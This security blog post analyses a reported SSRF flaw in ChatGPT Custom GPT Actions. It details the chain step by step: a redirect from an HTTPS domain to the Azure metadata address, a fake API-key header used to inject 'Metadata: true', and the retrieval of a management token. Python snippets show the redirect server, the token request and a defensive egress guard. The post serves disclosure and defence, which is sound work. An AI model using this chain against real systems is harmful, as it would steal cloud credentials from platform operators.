When Custom GPTs Become Cloud Backdoors: The ChatGPT SSRF Hack and the Future of AI Security

If you stay in security long enough, you eventually develop a bad habit: you stop seeing “features” and start seeing potential attack paths. The recent story about “ChatGPT hacked using Custom GPTs exploiting an SSRF vulnerability to expose secrets” is a textbook example. What looked like a convenient Actions feature for Custom GPTs turned out to be a tunnel straight into OpenAI’s cloud environment. No exotic prompt sorcery, no “AI magic” gone wrong—just a very old bug, server-side request forgery, rediscovered inside a very new platform.

That is precisely why this incident is important. It is not another hype headline about AI going rogue. It is a reminder that once you embed LLMs into real infrastructure, the traditional rules of application and cloud security return with a vengeance. The models may be new; the underlying mistakes are not.

Reconstructing the exploit: from “Add Action” to cloud token

To understand what happened, you have to look at how Custom GPTs work. OpenAI’s interface lets you define Actions, which are essentially external HTTP APIs that your GPT can call based on an OpenAPI schema. For users, this feels like giving your GPT “superpowers”: it can fetch data, trigger workflows, connect to internal systems. Under the hood, it means there is a backend HTTP client, running inside OpenAI’s infrastructure, that will happily call URLs you describe and feed the responses back into the model.
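
To make that trust relationship concrete, below is a deliberately simplified sketch of what an Actions-style backend effectively does with tenant configuration. The schema dictionary and function name are illustrative stand-ins, not OpenAI's actual implementation; the point is only that the URL and headers the platform's HTTP client ends up using come straight from tenant-controlled configuration.

import requests

# Hypothetical, stripped-down stand-in for a tenant-defined Action.
# In the real feature this is an OpenAPI schema plus authentication settings;
# only the parts relevant to the trust problem are kept here.
tenant_action = {
    "server": "https://api.tenant-controlled.example.com",  # tenant chooses this
    "path": "/lookup",
    "auth_headers": {"X-Api-Key": "tenant-supplied-value"},  # and this
}

def call_action(action: dict, params: dict) -> str:
    """What an Actions-style backend effectively does: build a request from
    tenant configuration and execute it from inside the platform's network."""
    url = action["server"] + action["path"]
    resp = requests.get(url, params=params, headers=action["auth_headers"], timeout=10)
    return resp.text  # fed back into the model's context

if __name__ == "__main__":
    print(call_action(tenant_action, {"q": "demo"}))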

A researcher from Open Security noticed exactly that. While playing with Custom GPTs, they saw the familiar pattern: user-controlled URLs, a “Test” button that sends live requests, and a server that clearly runs inside a cloud environment. Anyone who has done cloud pen-testing will recognize the instinct that follows: check whether you can trick that server into calling internal addresses on your behalf. That is the essence of SSRF.

In cloud environments, the most prized internal target is almost always the metadata service. On Azure, like on other clouds, it lives at the link-local address 169.254.169.254. From inside a VM or container, this endpoint can reveal details about the instance and, more importantly, issue short-lived tokens that allow workloads to call cloud management APIs. From outside the cloud, you cannot reach it. That is precisely why SSRF matters so much: you hijack the server’s vantage point and force it to talk to things you, as an external attacker, cannot.

The researcher’s first obstacle was that Custom GPT Actions only allowed HTTPS URLs, whereas the metadata service is HTTP-only. At first glance that restriction looks like a defense, but in practice it is just one more puzzle piece. The workaround was straightforward: register an external HTTPS domain under the researcher’s control, have it respond with a 302 redirect pointing to the http://169.254.169.254 metadata URL, and see whether the Actions backend followed the redirect. It did. Suddenly, an innocent-looking HTTPS call in the Custom GPT configuration resulted in an HTTP call to the internal cloud metadata endpoint.
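
The redirect half of the trick is easy to reproduce in a lab. Here is a minimal sketch of the kind of endpoint a tester might host on a domain they control, written with Python's standard library; the port and the specific metadata path are illustrative. In practice the handler would sit behind a TLS-terminating proxy so the Actions backend sees an ordinary HTTPS URL, and the only question under test is whether that backend follows the redirect.

from http.server import BaseHTTPRequestHandler, HTTPServer

# Hypothetical lab endpoint: every GET is answered with a 302 pointing at
# the HTTP-only Azure metadata address.
class RedirectToMetadata(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(302)
        self.send_header(
            "Location",
            "http://169.254.169.254/metadata/instance?api-version=2021-02-01",
        )
        self.end_headers()

if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 8080), RedirectToMetadata).serve_forever()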

Azure’s metadata service, however, is not completely naïve. To prevent casual abuse, it demands a special header, Metadata: true, on every request. If the header is missing, the service refuses to disclose real data. At this point it might seem that the system is safe again, because the OpenAPI schema interface used for defining Actions does not expose arbitrary header configuration. But large systems rarely have only one configuration surface. In this case, the Actions feature also supports the idea of “API keys” and other authentication headers that you can define when wiring an external service. Those headers are then attached automatically to outbound requests.

That was enough to complete the chain. By defining a fake “API key” whose header name was literally Metadata and whose value was true, the researcher convinced the backend to include the exact header Azure IMDS expects. Combine that with the redirect trick and you now have an SSRF channel from the Custom GPT Actions backend into the metadata service, with a valid Metadata: true header.

Once this channel was established, the rest was almost mechanical. The researcher asked the metadata service for an OAuth2 token intended for the Azure Management API, using the well-known IMDS path. The response contained an access token bound to the cloud identity that the ChatGPT infrastructure was using. That token could, at minimum, query management endpoints and potentially reach sensitive resources, depending on how much privilege the identity had. At that point the researcher stopped and reported the findings through OpenAI’s bug bounty program; OpenAI classified the flaw as high-severity and moved to patch it.
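
For reference, the legitimate version of that request, as Azure documents it for managed identities, looks roughly like the sketch below when issued from inside a workload. The SSRF chain reproduced this exact shape of request; the difference is that the Actions backend was tricked into sending it on an outsider's behalf.

import requests

# Azure IMDS identity endpoint: link-local, unreachable from outside the
# cloud, and it refuses to answer without the Metadata: true header.
IMDS_TOKEN_URL = "http://169.254.169.254/metadata/identity/oauth2/token"

params = {
    "api-version": "2018-02-01",
    "resource": "https://management.azure.com/",  # audience: Azure Management API
}

resp = requests.get(IMDS_TOKEN_URL, params=params, headers={"Metadata": "true"}, timeout=3)
print("Got access token:", "access_token" in resp.json())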

What makes this chain striking is that the attacker never needed shell access, source code, or any classic bug in the HTTP stack. Everything happened inside normal configuration screens: URLs, authentication settings, and a test button that dutifully executed the mischief.

A tiny code sketch of an SSRF-style probe

To make this more concrete, imagine a very small internal helper script that a security engineer might use to sanity-check an “Actions-style” HTTP client. The goal is not to hit real metadata services in production, but to codify the habit of probing for unexpected redirects and internal IP hops in staging or lab environments:

import ipaddress
import socket
from urllib.parse import urljoin, urlparse

import requests

def trace_request(base_url: str, path: str = "/"):
    url = urljoin(base_url, path)
    print(f"[+] Requesting {url}")
    try:
        resp = requests.get(url, timeout=3, allow_redirects=True)
    except Exception as e:
        print(f"[!] Error: {e}")
        return

    print(f"[+] Final URL: {resp.url}")
    print(f"[+] Status: {resp.status_code}")
    print("[+] Redirect chain:")
    for h in resp.history:
        print(f"    {h.status_code} -> {h.headers.get('Location')}")

    # Very rough heuristic: warn if the final hop resolves to an internal IP.
    # (requests has usually released the underlying socket by now, so we
    # re-resolve the final hostname rather than poke at private connection state.)
    final_host = urlparse(resp.url).hostname
    if final_host:
        try:
            peers = {info[4][0] for info in socket.getaddrinfo(final_host, None)}
        except socket.gaierror:
            peers = set()
        for peer in peers:
            print(f"[+] Peer IP: {peer}")
            ip = ipaddress.ip_address(peer)
            if ip.is_private or ip.is_link_local or ip.is_loopback:
                print("[!] Warning: backend followed a redirect into an internal address")
                break

if __name__ == "__main__":
    # Example: replace with a controlled test endpoint in your own lab
    trace_request("<https://your-test-endpoint.example.com>")

A script like this does not “exploit ChatGPT,” but it captures the same investigative shape: start from a supposedly safe external URL, follow redirects, and loudly complain if your HTTP client suddenly finds itself talking to internal or link-local IP ranges. Turning that pattern into automation—and running it against the components that power your own AI Actions—is far more useful than just reading about the incident.

It is not an “AI bug”; it is old-school cloud abuse on a new stage

It is very tempting to read this as “ChatGPT was hacked” and move on. That framing misses the deeper lesson. Nothing about the model itself misbehaved. There was no prompt that somehow unlocked forbidden capabilities. The LLM did what it was told: call an Action, read the result, and summarize it. The vulnerability lived entirely in the glue between the LLM and the outside world.

That glue is exactly where security teams need to move their focus. Whenever you give an LLM the ability to call tools, Actions, or plugins, you are effectively turning it into a programmable client in your infrastructure. In the past, a user would manually call your API, and you would review their input. Now, a user gives instructions to a model, and the model translates that into API calls on their behalf. The model becomes another way for hostile intent to reach your backend.

Seen through that lens, this incident is simply OWASP SSRF in a different costume. The conditions are all familiar: user-influenced URLs, a server that can reach internal or privileged endpoints, missing or incomplete egress controls, and a cloud metadata service that is too accessible from regular workloads. The difference is that the entry point is no longer a classic web form or a JSON field; it is a configuration block that was designed to make Custom GPTs more powerful.

This is also why the blast radius matters. The affected server was not a random microservice; it was part of ChatGPT’s multi-tenant infrastructure, sitting inside OpenAI’s Azure environment. Any token obtained via IMDS belonged to a workload that already had meaningful access. Even if local defenses limited what the attacker could do, the risk profile is fundamentally different from a forgotten test VM.

AI as an integration hub: widening attack surfaces and moving trust boundaries

The more interesting story behind this bug is architectural. AI platforms are rapidly becoming integration hubs. A Custom GPT for a sales team may talk to a CRM, a billing system, and a document store. A security-focused GPT might talk to scanners, ticketing systems, and CI/CD. In each case, the LLM is not the asset; the data and actions behind those connectors are.

Once you accept that reality, your mental threat model has to change. You cannot keep thinking of “AI security” as only prompt injection, data leakage, or toxic outputs. You also have to ask deeply unglamorous questions about network boundaries, cloud identity, and tenant isolation.

What can the infrastructure that runs your Actions actually talk to on the network? The default in many cloud environments is “anything outbound is allowed as long as DNS resolves.” That made sense when services were relatively simple and engineers wanted flexibility. Put an LLM platform in the middle, however, and every tenant suddenly has a way to propose new outbound destinations through configuration, rather than code. If there is no strong egress policy, you have effectively created a programmable SSRF launcher.
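
At the application layer, the corresponding guardrail is an HTTP client that refuses to be used that way. The sketch below shows one possible shape for such a guard, assuming you control the client that executes Action calls: automatic redirects are disabled, and every hop is re-validated against private and link-local ranges before it is followed. It is illustrative rather than production-ready; a real deployment would also pin resolved IPs to defeat DNS rebinding and pair the check with network-level egress policy.

import ipaddress
import socket
from urllib.parse import urljoin, urlparse

import requests

MAX_HOPS = 5

def host_is_internal(host: str) -> bool:
    """Resolve a hostname and treat private, link-local, loopback, or
    unresolvable targets as off-limits."""
    try:
        addrs = {info[4][0] for info in socket.getaddrinfo(host, None)}
    except socket.gaierror:
        return True  # fail closed
    return any(
        ipaddress.ip_address(a).is_private
        or ipaddress.ip_address(a).is_link_local
        or ipaddress.ip_address(a).is_loopback
        for a in addrs
    )

def guarded_get(url: str) -> requests.Response:
    """Follow redirects manually, re-checking the egress policy at every hop."""
    for _ in range(MAX_HOPS):
        parsed = urlparse(url)
        if parsed.scheme != "https" or not parsed.hostname or host_is_internal(parsed.hostname):
            raise ValueError(f"Egress policy rejected {url}")
        resp = requests.get(url, allow_redirects=False, timeout=5)
        if resp.is_redirect:
            url = urljoin(url, resp.headers["Location"])
            continue
        return resp
    raise ValueError("Too many redirects")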

How much privilege do the identities used by these workloads actually have? In the ChatGPT case, the researcher was able to request a token for the Azure Management API. Even if that token was limited by role assignments, it still represents a high-value secret. In many organizations, the temptation to give “platform infrastructure” wide permissions is strong, because it simplifies deployment. For anything that can be driven indirectly by user input, especially through AI, that temptation is dangerous.
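
During an authorized test, the quickest way to start answering that question for a recovered bearer token is to inspect its claims before using it anywhere: the audience it was minted for and how long it lives. A minimal sketch, assuming the token is a standard JWT (Azure AD access tokens are):

import base64
import json

def peek_jwt_claims(token: str) -> dict:
    """Decode a JWT payload without verifying the signature, purely to
    inspect claims such as 'aud' (audience) and 'exp' (expiry) during a test."""
    payload_b64 = token.split(".")[1]
    payload_b64 += "=" * (-len(payload_b64) % 4)  # restore stripped base64 padding
    return json.loads(base64.urlsafe_b64decode(payload_b64))

# Hypothetical usage with a token obtained in scope of an engagement:
# claims = peek_jwt_claims(access_token)
# print(claims.get("aud"), claims.get("exp"))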

Where exactly are the trust boundaries between tenants, between the control plane and the data plane, and between the AI runtime and the rest of the cloud? A well-designed system should assume that any one tenant’s configuration could become adversarial, that any outgoing call on behalf of that tenant might be hostile, and that any elevation from Action to metadata to management APIs is a realistic attacker goal. That perspective makes patterns like strict network segmentation, companion sidecars enforcing policies, and dedicated service identities non-negotiable rather than “nice to have.”

From one incident to a repeatable testing methodology

For defenders and builders, the real value of this story is not the specific bug; it is the testing mindset it illustrates. The researcher essentially treated Custom GPT Actions as a strange new kind of HTTP client and then walked through a familiar checklist: can I control the URL, can I reach internal hosts, can I abuse redirects, can I inject headers, can I hit metadata, can I turn that into a cloud token?

That mental checklist is exactly what should be automated inside modern penetration testing workflows for AI platforms. Instead of waiting for a headline and a bounty report, teams should be routinely turning their own Custom GPT infrastructure, plugin ecosystems, and tool chains into targets.

To make that a bit more tangible, you can think of an “AI Actions SSRF review” as a simple, repeatable sequence like this:

Phase | Key Question | Example in the ChatGPT case
URL influence | Can a tenant meaningfully control the URL? | Custom GPT Actions allow user-defined external endpoints.
Redirect behavior | Do we follow redirects into unknown locations? | HTTPS endpoint redirected into 169.254.169.254.
Header manipulation | Can the tenant indirectly set sensitive headers? | API-key configuration used to inject Metadata: true.
Privilege and tokens | What can any obtained token actually do? | IMDS issued a management API token for the workload.

Once you have this kind of table written down for your environment, it becomes much easier to both automate and explain the testing you do. You can plug it into internal playbooks, share it with vendors, and ensure future AI features are held to the same standard.

This is where specialized, AI-aware security tooling starts to matter. A generic web scanner might not know how to navigate a UI that hides network calls behind Actions or how to reason about OpenAPI schemas used inside a GPT definition. In contrast, an AI-driven pentest platform such as Penligent can treat those schemas and configurations as first-class inputs. You can imagine a workflow where you export the Actions configuration for a set of Custom GPTs or other AI tools, feed them into an agentic testing pipeline, and let it systematically probe for SSRF conditions, unsafe redirects, unbounded network access, and metadata exposure.

Penligent’s philosophy of combining automation with human-in-the-loop control fits this pattern well. An agent can enumerate all tool definitions, generate candidate payloads for endpoints that accept URLs or hostnames, and drive scripted traffic that simulates what a curious attacker would try. Once the system discovers a promising behavior—say, that an apparently external HTTPS endpoint follows redirects into internal IP ranges—it can surface this as evidence: request logs, response snippets, and inferred internal topology. A human operator can then steer the next steps, for example asking the system to pivot specifically toward cloud metadata routes or to verify whether any returned tokens are valid against management APIs.

That sort of workflow accomplishes two things. It brings AI platforms into the same evidence-driven security loop that web applications and APIs already enjoy, and it leverages the same LLM capabilities that attackers will inevitably use, but in the service of defenders. The bug that hit ChatGPT is then no longer a one-off surprise; it becomes a test case in a regression suite you can run whenever you introduce a new integration or change your Actions infrastructure.

Practical lessons for teams building on top of AI platforms

If you are a security engineer or architect who consumes AI services rather than building them, this incident is still highly relevant. Even if you never touch Custom GPTs internally, you probably expose internal APIs, dashboards, or document stores to AI agents or co-pilots of some sort. The ideas are transferable.

The first step is to stop treating the LLM as the only thing that needs security review. Any feature that lets models call back into your environment—whether through explicit tools, Actions, or indirect webhooks—must be viewed as a potential attack graph. You should be able to answer, with some confidence, which internal services an AI component can talk to, what identities it uses, and what happens if a hostile user deliberately tries to stretch those capabilities.

The second step is to extend your testing programs to cover the AI glue code. When you commission a penetration test or run an internal red-team exercise, make sure the scope explicitly includes AI integrations: the configuration surfaces for tools, the way URLs and headers are constructed, the network paths between AI runtimes and sensitive services, and the protections around metadata endpoints. Ask for evidence that someone, somewhere, tried to abuse these like a real attacker would.

The third step is to accept that this attack surface will not shrink. As more business processes plug into LLMs, there will be more Actions, more plugins, more background services performing work on behalf of prompts. You can either bolt on security as a series of incident-driven patches, or you can build a repeatable program: clear threat models, baseline architecture patterns, automated testing flows, and tooling—potentially powered by systems like Penligent—that keeps probing as your environment evolves.

Beyond the headline

The Custom GPT SSRF hack is easy to misread as a one-time embarrassment for a single vendor. It is more productive to read it as a preview. AI platforms are rapidly growing into orchestration layers that connect users, models, APIs, and cloud infrastructure. That role comes with power, and power always comes with a bigger blast radius when something goes wrong.

The encouraging part of this story is that it also shows the path forward. The vulnerability was found by a researcher who followed old instincts in a new context. It was reported through a standard bug bounty channel. It was fixed. The rest of us can now take the same playbook and apply it proactively to our own systems, ideally with help from tools that understand both security and AI.

If we do that, then the legacy of this incident is not just “ChatGPT once had an SSRF.” It becomes a case study in how to think about AI security: treat models as one component in a larger system, treat integrations as serious attack surfaces, and use automation plus human insight, whether through platforms like Penligent or your own internal pipelines, to continually turn vague concern into concrete, testable, evidence-backed assurance. That is a story worth telling, and one even more worth putting into practice inside your engineering organization.
